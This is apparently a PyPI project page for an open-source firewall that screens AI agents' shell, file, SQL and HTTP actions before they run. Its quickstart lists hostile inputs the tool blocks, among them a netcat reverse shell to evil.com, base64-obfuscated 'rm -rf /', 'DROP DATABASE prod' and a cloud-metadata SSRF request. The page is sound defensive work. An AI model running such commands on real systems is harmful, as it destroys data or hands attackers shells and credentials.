Deterministic execution-level safety layer between AI agents and real systems (shell, files, SQL, HTTP).
Project description
AI Execution Firewall
Deterministic safety layer between AI agents and real systems. Gate shell commands, file edits, SQL queries, and HTTP requests through a policy pipeline before they execute.
Open source (MIT) — built in the open. Issues, PRs, and ideas all welcome.
AI → Action → Firewall → Decision → Execution
The firewall classifies intent, scores risk, applies YAML rules, simulates impact (unified diff for code, SQL AST findings, git context, SSRF / leaked-secret detection for URLs), and returns one of ALLOW / BLOCK / REQUIRE_APPROVAL. Every decision is appended to an audit log.
In v0.3.0 the firewall fades into the background for routine work: it remembers which commands you've approved, inherits permissions from what you just typed in your own terminal, parses commands semantically (catches echo "<base64>" | base64 -d | sh as the decoded rm -rf /), and runs destructive commands in a Docker dry-run sandbox before touching real disk.
v0.4.0 is the enterprise round — seven additions that move the firewall from "useful CLI for one dev" to "deployable in a regulated org": AI-SBOM validation against PyPI / npm / crates.io / RubyGems with typosquat detection, AI-native DLP (PII scanner alongside the existing secret scanner), network egress control (curl / wget / nc / socat route through the same gate as guard api), fine-grained RBAC via guard.toml with role inheritance and --as <role>, rule-based behavior analytics (rate burst, last-hour spike vs 24h median, quiet-hour outliers — anomalies downgrade ALLOW to REQUIRE_APPROVAL, never escalate BLOCK), SIEM-ready audit sinks (syslog / Splunk HEC / generic HTTPS webhook / stdout for vector / fluent-bit, all async with bounded queues), and cost & resource governance (rate limits, loop detection, daily API-byte budget).
v0.5.0 is the active interceptor release. The VS Code extension stops being a passive Command-Palette tool and becomes the gate. On first activation it shells out to guard mcp scan --json, surfaces a one-click consent toast, and (on user approval) installs the Claude Code PreToolUse hook into ~/.claude/settings.json and runs guard mcp install <server> for every detected MCP server. From then on, when an AI tool tries something risky, the firewall's existing pipeline runs as today — and on REQUIRE_APPROVAL it routes the Decision back to the extension's loopback HTTP server (127.0.0.1:<random>, token-authenticated via ~/.ai-firewall/extension.port) so the user gets the actual Decision in a webview and clicks Approve / Reject. The AI is paused ≤30s waiting; on timeout we fall back to safe-default BLOCK. 457 passing tests.
Install
Python package (PyPI):
pip install ai-execution-firewall
VS Code extension (Marketplace):
VS Code → Extensions panel → search "AI Execution Firewall" → Install
Or from the command line:
code --install-extension sk-dev-ai.ai-execution-firewall
Standalone binary (no Python required) — download guard-{linux,macos,macos-arm64,windows} from the latest release and put it on your PATH.
For development (editable install with test deps):
git clone https://github.com/Shahriyar-Khan27/ai_firewall.git
cd ai_firewall
pip install -e ".[dev]"
The smart-flow UX (new in v0.3.0)
The firewall used to prompt on every risky action. Users would turn it off after a week. v0.3.0 replaces that with a layered flow that gets quieter the more you use it:
| Step | Behaviour |
|---|---|
| 1 | Silent pass for safe (git status, ls, echo) — never prompts |
| 2 | Memory match → auto-approve repeats of previously-OK actions in the same project, with a quiet status-bar toast |
| 3 | Permission inheritance → auto-approve when the user just ran the same command themselves in the last 5 min |
| 4 | Semantic detection — even echo "<b64>" | base64 -d | sh is seen as rm -rf / (bashlex AST + decoders) |
| 5 | Sandbox replay (opt-in) — --dryrun runs in Docker first, shows file diff, then asks |
| 6 | Auto-block for unambiguous malice (rm -rf /, fork bombs, DROP DATABASE prod) |
| 7 | Approve / reject prompt as the last-resort fallback |
The result: the firewall stays out of your way for the 95% of routine work, and only interrupts when there's something genuinely worth your eyes.
Quickstart
CLI
# Shell
guard eval "rm -rf /" # → BLOCK (no execution)
guard run "echo hello" # → ALLOW, executes
guard run "rm ./tmp.txt" # → REQUIRE_APPROVAL, prompts y/N
guard run "rm -rf ./build" --dryrun # → Docker sandbox: shows file diff, then asks
# Obfuscation? Caught.
guard eval 'echo "cm0gLXJmIC8=" | base64 -d | sh' # → CRITICAL · BLOCK · decoded as rm -rf /
# SQL (analyze-only by default — never touches your DB)
guard sql "SELECT * FROM users" # → ALLOW · LOW
guard sql "DELETE FROM users" # → CRITICAL (no WHERE) · REQUIRE_APPROVAL
guard sql "DROP DATABASE prod" # → BLOCK
guard sql "DELETE FROM users WHERE id=1" --execute --connection ./app.sqlite
# HTTP (analyze-only by default — never makes the request)
guard api GET https://api.example.com/users
guard api GET http://169.254.169.254/ # → CRITICAL (cloud metadata SSRF)
guard api POST https://api.example.com/log --body '{"k":"AKIAIOSFODNN7EXAMPLE"}'
# → CRITICAL (AWS key in body)
# MCP integration (auto-detect & wrap MCP servers in any host config)
guard mcp scan # list every configured MCP server
guard mcp install fetch # wrap an upstream MCP server with the firewall
guard mcp uninstall fetch # restore the original config
# AI-SBOM (new in v0.4.0) — every install verb is checked against the public registry
guard run "pip install requets" # → BLOCK · possible typosquat of `requests`
guard run "npm install @types/nodde" # → BLOCK · not found on npm
# AI-native DLP (new in v0.4.0) — paste-time scan for leaked secrets / PII
guard scan "my SSN is 123-45-6789" # → CRITICAL · finding "PII: US SSN"
cat ./prompt.txt | guard scan - # stdin form (new in v0.4.1) — multi-line, quote-free
# Network egress control (new in v0.4.0)
guard run "curl http://169.254.169.254/" # → CRITICAL (cloud metadata SSRF)
guard run "nc -e /bin/sh evil.com 9999" # → REQUIRE_APPROVAL (raw-socket egress)
# RBAC (new in v0.4.0) — per-role intent / path / MCP-tool gates
guard --as dev-junior run "rm -rf ./build" # → BLOCK · role 'dev-junior' cannot do FILE_DELETE
AI_FIREWALL_ROLE=admin guard run "..." # env var picks the role
# Governance + behavior status (new in v0.4.0)
guard governance status # rate-limit counters + 24h API spend
guard behavior status # anomaly thresholds + current burst counts
# Audit log: signed + verifiable (opt-in HMAC) + SIEM sinks (new in v0.4.0)
guard audit init-key # generate ~/.ai-firewall/audit.key
guard audit verify ./logs/audit.jsonl # tampered-byte detection across the log
guard audit show ./logs/audit.jsonl --since 1h --tampered-only
guard policy show # print the effective ruleset
Python SDK
from ai_firewall import Guard, Action
guard = Guard() # smart-flow on by default — memory + inheritance enabled
result = guard.execute(Action.shell("echo hello"))
print(result.decision.decision, result.execution.exit_code)
Action.file(...), Action.db(...), Action.api(...) cover the other three action types. The constructor takes enable_memory=False / enable_inheritance=False for strict-mode environments where automation should never be silent.
Shell hook
source scripts/guard-shell-hook.sh # wraps rm, mv, dd, chmod, chown
Auto-mode AI tools (Claude Code, Cursor, Continue.dev, Zed)
The flows above all require deliberate routing. That's not enough when an AI agent runs unattended in auto-accept mode — the agent doesn't ask first.
Claude Code — PreToolUse hook (intercepts every Bash / Write / Edit call)
The hook fires before Claude Code dispatches any tool, even with --dangerously-skip-permissions. If policy says BLOCK or REQUIRE_APPROVAL, the call is refused and the AI gets the reason back.
Add to ~/.claude/settings.json:
{
"hooks": {
"PreToolUse": [{
"matcher": "Bash|Write|Edit|MultiEdit|NotebookEdit",
"hooks": [{
"type": "command",
"command": "python /absolute/path/to/ai_firewall/scripts/claude-code-pretooluse.py"
}]
}]
}
}
A copyable example lives at examples/claude-code-settings.json.
MCP — wrap any MCP-capable host (Claude Code, Cursor, Continue, Zed, Cline, …)
pip install "ai-execution-firewall[mcp]"
Manual (drop in your client's mcp.json):
{
"mcpServers": {
"ai-firewall": {"command": "guard", "args": ["mcp"]}
}
}
Automatic — let the firewall scan and wrap your existing MCP servers:
guard mcp scan # list what's configured
guard mcp install fetch # rewrites the mcp.json to route 'fetch' through the firewall
After wrapping, every tools/call JSON-RPC request from the host runs through Guard.evaluate first. BLOCK and REQUIRE_APPROVAL responses are returned to the host as tool errors — the upstream MCP server is never reached for risky calls. Heuristic argument-shape mapping handles the common conventions (command, file_path, sql, url).
VS Code extension
After installing from the Marketplace, the extension auto-detects which AI tools you have configured (Claude Code via ~/.claude/settings.json, every MCP-aware host via guard mcp scan --json) and offers a one-click toast to wire firewall protection into all of them. From then on, when an AI tries something risky, the existing approval webview pops up automatically — no manual invocation needed. (new in v0.5.0)
The Command Palette (Ctrl+Shift+P) gives you these manual commands under AI Firewall:
- Detect & Wire AI Tools / Unwire All AI Tools (new in v0.5.0) — re-arm or reverse the auto-wire flow
- Show Status (new in v0.5.0) — markdown summary of wired hosts + last 20 audit decisions
- Run Shell Command… / Evaluate Selected Text as Shell Command
- Evaluate SQL Query… / Evaluate Selected Text as SQL
- Evaluate HTTP Request…
- Show Effective Policy
- Show Recent Secret-DB Activity (v0.3.0 — passive watcher for
state.vscdbmodifications) - Scan Text for Secrets and PII… / Scan Selection for Secrets and PII (v0.4.0)
- Show Governance Status / Show Behavior Status (v0.4.0)
Risky actions open a themed approval webview with the risk badge, intent / decision pills, findings list, git context, and a syntax-coloured unified diff. Smart-flow auto-approvals (memory or inheritance match) instead surface a quiet status-bar toast — no webview, no friction. See vscode-extension/README.md for build / debug / packaging instructions.
Pipeline
Every guard.execute(action) call runs:
- RBAC pre-pass (new in v0.4.0) — load
~/.ai-firewall/guard.toml(or per-project.guard.toml), pick the active role (priority:--asflag →AI_FIREWALL_ROLEenv →default_role→"dev"), and check intent / file glob / MCP-tool deny lists. DENY is final BLOCK. - Governance pre-pass (new in v0.4.0) — rolling-window check on the audit log: rate limit per intent, loop detection (same normalized command repeated), and 24h API-byte budget. BLOCK on first violation.
- Intent classifier — bashlex AST / SQL parse / URL parse → one of
FILE_DELETE | FILE_WRITE | FILE_READ | SHELL_EXEC | CODE_MODIFY | DB_READ | DB_WRITE | DB_DESTRUCTIVE | API_READ | API_WRITE | API_DESTRUCTIVE | NETWORK_EGRESS. Multi-command shells take the worst of every effective command; obfuscation (base64/hex/printf decoding) bumps a baseline HIGH risk regardless of what's inside;curl/wget/nc/socat/scproute to API_* / NETWORK_EGRESS (new in v0.4.0). - Risk analyzer — table lookup on intent + feature flags →
LOW | MEDIUM | HIGH | CRITICAL - Policy engine — YAML rules →
ALLOW | BLOCK | REQUIRE_APPROVAL(first pass) - Impact engine — best-effort dry-run:
- Files: glob expansion, file stat, unified diff, AST findings (removed funcs / tests, auth identifiers), git context (uncommitted, untracked, gitignored)
- SQL:
sqlglotAST → DELETE/UPDATE without WHERE, DROP DATABASE/SCHEMA/TABLE, TRUNCATE, GRANT/REVOKE, multiple statements - HTTP: cloud metadata endpoints, private/loopback hosts (SSRF), URL credentials, secrets in query string, non-HTTP schemes, destructive paths; body + Authorization-header secret + PII scanning (v0.4.0 DLP — emails, US SSN, Luhn-validated CCs, E.164/US phone, IBAN, high-entropy tokens); body + headers checked for AWS / GitHub / Slack / Stripe / Google / Anthropic / OpenAI / PEM keys / JWTs
- Shell installs (new in v0.4.0):
pip install/npm install/cargo install/gem installverify the package against the public registry; unknown packages → CRITICAL, typosquats of top-100 packages → HIGH
- Risk bump — impact findings can raise risk and re-trigger policy
- Smart-flow (v0.3.0) — when policy says REQUIRE_APPROVAL, check inheritance (did the user just run an equivalent command in their own terminal?) and memory (have they approved this kind of thing in this project before?). Either match downgrades to ALLOW with a status-bar toast. BLOCK is never downgraded.
- Behavior pass (new in v0.4.0) — three rule-based heuristics on the audit log: rate burst (per-intent count in N seconds), rate spike (last hour vs 24h median), quiet-hour outlier (intent appearing in a historically-zero hour-of-day). An anomaly downgrades ALLOW into REQUIRE_APPROVAL — never escalates BLOCK or upgrades approval.
- Decision engine — combines verdict + risk + impact
BLOCK raises immediately. REQUIRE_APPROVAL invokes the approval function (CLI prompt or VS Code webview). ALLOW runs through the matching adapter.
Every evaluated action is appended to logs/audit.jsonl — optionally HMAC-SHA256 signed (see guard audit init-key) and broadcast to any configured SIEM sinks (new in v0.4.0 — syslog / Splunk HEC / generic HTTPS webhook / stdout, all async with bounded queues).
Adapters
| Action type | Default adapter | Opt-in execute adapter |
|---|---|---|
shell |
ShellAdapter (subprocess) |
DockerSandboxAdapter via --dryrun (Feature F) |
file |
FileAdapter (pathlib) |
— |
db |
DBAnalyzeAdapter — never opens a DB |
SQLiteExecuteAdapter via --execute --connection <sqlite-path> |
api |
APIAnalyzeAdapter — never sends a request |
HTTPExecuteAdapter via --execute (stdlib urllib) |
DB and API default to analyze-only so the firewall never touches your database or network unless you explicitly opt in. Sandbox dry-run is opt-in for shell and runs your command in a disposable container against a snapshot of the workdir, then surfaces the file diff before letting you confirm.
Custom rules
Pass --rules path/to/rules.yaml (CLI) or Guard(rules_path=...) (SDK). See ai_firewall/config/default_rules.yaml for the schema:
shell_exec:
blocked:
- 'rm\s+-rf\s+/'
require_approval:
risk_at_or_above: HIGH
file_delete:
require_approval: true
db_destructive:
blocked:
- 'DROP\s+DATABASE'
require_approval: true
api_destructive:
require_approval: true
Scope
Shipped (v0.4.0):
- Phase 1: shell + filesystem, rule-based classifier, CLI prompt approval, CLI / SDK / shell-hook surfaces.
- Phase 2: unified diff for code edits, AST-aware risk findings, git-aware impact, VS Code extension with webview approval UI.
- Phase 3: SQL gating via
sqlglot, HTTP gating via stdliburllib, secret-scanning of request bodies and Authorization-style headers, opt-in execute adapters for SQLite and HTTP. - v0.3.0 — smart-flow & distribution:
- Semantic command parsing (bashlex) with obfuscation decoding
- Approved-pattern memory (project-scoped, risk-gated, ≥0.8 Jaccard)
- Permission inheritance from bash / zsh / fish / PowerShell history
- HMAC-SHA256-signed audit trails +
guard audit verify - Docker sandbox replay (
--dryrun) - MCP transparent proxy with auto-detect (
guard mcp install/uninstall) - PyInstaller standalone binary (no Python prerequisite)
- VS Code passive Cursor secret-DB watcher
- v0.4.0 — enterprise round (single release, 7 features):
- AI-SBOM validation against PyPI / npm / crates.io / RubyGems with Damerau-Levenshtein typosquat detection
- AI-native DLP — PII scanner (email, US SSN, Luhn-validated CCs, E.164/US phone, IBAN, high-entropy tokens) bolted onto every existing secret-scan channel; new
guard scanCLI for paste-time checks - Network egress control —
curl/wget/httpieroute through the API gate;nc/socat/telnet/scp/rsyncclassify asNETWORK_EGRESS - Fine-grained RBAC —
~/.ai-firewall/guard.toml(and per-project.guard.tomloverride) with role inheritance, intent / file-glob / MCP-tool allow-deny lists,--as <role>flag - Behavior analytics — three rule-based anomaly heuristics (rate burst, rate spike, quiet-hour outlier) reading the audit log; only ever downgrades ALLOW to REQUIRE_APPROVAL
- SIEM-ready audit sinks —
JsonlFileSink(default, sync) + asyncSyslogSink(RFC 5424),SplunkHECSink,HttpsSink,StdoutSink(vector / fluent-bit pipe), all bounded-queue with daemon workers - Cost & resource governance — per-intent rate limits, loop detection (same normalized command repeated), and 24h API-byte budget;
guard governance status+guard behavior statusCLIs
Out / future:
- Postgres / MySQL execute adapters (currently SQLite only)
- Firecracker / gVisor sandbox backends (Docker first)
- Cloud control plane / web dashboard
- Team policy distribution
- LLM SDK middleware-style DLP (intercept
openai.chat.completions.create()directly) - Statistical / ML-based behavior models (per-project z-score baselines, trained anomaly detectors)
- OS-level network firewall integration (iptables / Windows Filter Platform)
Tests
pytest -q
457 tests + 1 skipped (Docker round-trip skips when no daemon). CI runs the full suite on Python 3.11 / 3.12 / 3.13 on every push, plus PyInstaller binary builds on tag push.
Release flow
Pushing a tag matching v* automatically:
- runs the full test matrix on GitHub Actions,
- builds sdist + wheel,
- publishes to PyPI via Trusted Publishing (no API token in CI),
- builds standalone PyInstaller binaries for Linux / macOS / macOS-arm64 / Windows and attaches them to the GitHub release.
# Bump version in pyproject.toml + ai_firewall/__init__.py, refresh
# README.md and CHANGELOG.md, commit, then:
git tag -a v0.4.0 -m "v0.4.0"
git push --tags
# PyPI is updated within ~60 seconds; binaries within ~5 minutes.
VS Code Marketplace publishing is currently manual — re-build the .vsix (npx vsce package --no-yarn from vscode-extension/) and upload via the Marketplace publisher manage page.
Contributing
This project is fully open source under the MIT license. Contributions of any size are welcome.
Good first issues to pick up:
- New SBOM registries (Composer / NuGet / Go modules) — extends
ai_firewall/engine/package_registry.py - Postgres / MySQL execute adapters — currently SQLite is the only real-execute path
- Additional MCP host detectors — Zed, Cline, Aider have evolving config layouts
- Translations / docs polish — README, CHANGELOG, in-CLI help
- New PII patterns — extend
ai_firewall/engine/pii_scan.py(regex + Luhn-style validators welcome) - Statistical / ML behaviour models on top of the audit log —
engine/behavior.pyis currently rule-based
How to contribute:
git clone https://github.com/Shahriyar-Khan27/ai_firewall.git
cd ai_firewall
pip install -e ".[dev]"
pytest -q # confirm 457 tests pass
# make your change, add a test, push a branch, open a PR
Run pytest before opening a PR. CI will re-run on Python 3.11 / 3.12 / 3.13. New features land with tests; we don't merge regressions.
Bugs / questions / feature requests: open an issue at https://github.com/Shahriyar-Khan27/ai_firewall/issues. For security-relevant findings, see SECURITY.md if present, or email the maintainer privately.
Star the repo if it's useful — it's the simplest signal that this kind of safety tooling matters and is worth maintaining.
Links
- PyPI: https://pypi.org/project/ai-execution-firewall/
- VS Code Marketplace: https://marketplace.visualstudio.com/items?itemName=sk-dev-ai.ai-execution-firewall
- GitHub repo: https://github.com/Shahriyar-Khan27/ai_firewall
- GitHub releases: https://github.com/Shahriyar-Khan27/ai_firewall/releases
- Issues: https://github.com/Shahriyar-Khan27/ai_firewall/issues
- CHANGELOG: CHANGELOG.md
License
MIT — see LICENSE. Free for commercial and personal use, in any context, with attribution.
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file ai_execution_firewall-0.5.0.tar.gz.
File metadata
- Download URL: ai_execution_firewall-0.5.0.tar.gz
- Upload date:
- Size: 131.2 kB
- Tags: Source
- Uploaded using Trusted Publishing? Yes
- Uploaded via: twine/6.1.0 CPython/3.13.12
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
771e6b8568b60ff61e65275f7b6434bddc813533c121ce595d049963121ac25e
|
|
| MD5 |
81738585f3e3777ea52a7f8e6d82155f
|
|
| BLAKE2b-256 |
0b4a5041f13ce9204209993c92da4028a9e7a291506aaae1d96c68f7ebbe7d42
|
Provenance
The following attestation bundles were made for ai_execution_firewall-0.5.0.tar.gz:
Publisher:
publish.yml on Shahriyar-Khan27/ai_firewall
-
Statement:
-
Statement type:
https://in-toto.io/Statement/v1 -
Predicate type:
https://docs.pypi.org/attestations/publish/v1 -
Subject name:
ai_execution_firewall-0.5.0.tar.gz -
Subject digest:
771e6b8568b60ff61e65275f7b6434bddc813533c121ce595d049963121ac25e - Sigstore transparency entry: 1417946151
- Sigstore integration time:
-
Permalink:
Shahriyar-Khan27/ai_firewall@dc7e9e1c8de69f34b56c9c0edf6559cf061f78e1 -
Branch / Tag:
refs/tags/v0.5.0 - Owner: https://github.com/Shahriyar-Khan27
-
Access:
public
-
Token Issuer:
https://token.actions.githubusercontent.com -
Runner Environment:
github-hosted -
Publication workflow:
publish.yml@dc7e9e1c8de69f34b56c9c0edf6559cf061f78e1 -
Trigger Event:
push
-
Statement type:
File details
Details for the file ai_execution_firewall-0.5.0-py3-none-any.whl.
File metadata
- Download URL: ai_execution_firewall-0.5.0-py3-none-any.whl
- Upload date:
- Size: 110.7 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? Yes
- Uploaded via: twine/6.1.0 CPython/3.13.12
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
d01c1b70d9b671d75124bfd6ebd499a8e96879aa3ef96a4010ca59a7b5cfe04f
|
|
| MD5 |
85986145ef517805b224333414e04d7f
|
|
| BLAKE2b-256 |
ec9ccfa0a6e9f3dcc006c515009d73e1753df7cd0a22a2359bbd5f267d39d002
|
Provenance
The following attestation bundles were made for ai_execution_firewall-0.5.0-py3-none-any.whl:
Publisher:
publish.yml on Shahriyar-Khan27/ai_firewall
-
Statement:
-
Statement type:
https://in-toto.io/Statement/v1 -
Predicate type:
https://docs.pypi.org/attestations/publish/v1 -
Subject name:
ai_execution_firewall-0.5.0-py3-none-any.whl -
Subject digest:
d01c1b70d9b671d75124bfd6ebd499a8e96879aa3ef96a4010ca59a7b5cfe04f - Sigstore transparency entry: 1417946165
- Sigstore integration time:
-
Permalink:
Shahriyar-Khan27/ai_firewall@dc7e9e1c8de69f34b56c9c0edf6559cf061f78e1 -
Branch / Tag:
refs/tags/v0.5.0 - Owner: https://github.com/Shahriyar-Khan27
-
Access:
public
-
Token Issuer:
https://token.actions.githubusercontent.com -
Runner Environment:
github-hosted -
Publication workflow:
publish.yml@dc7e9e1c8de69f34b56c9c0edf6559cf061f78e1 -
Trigger Event:
push
-
Statement type: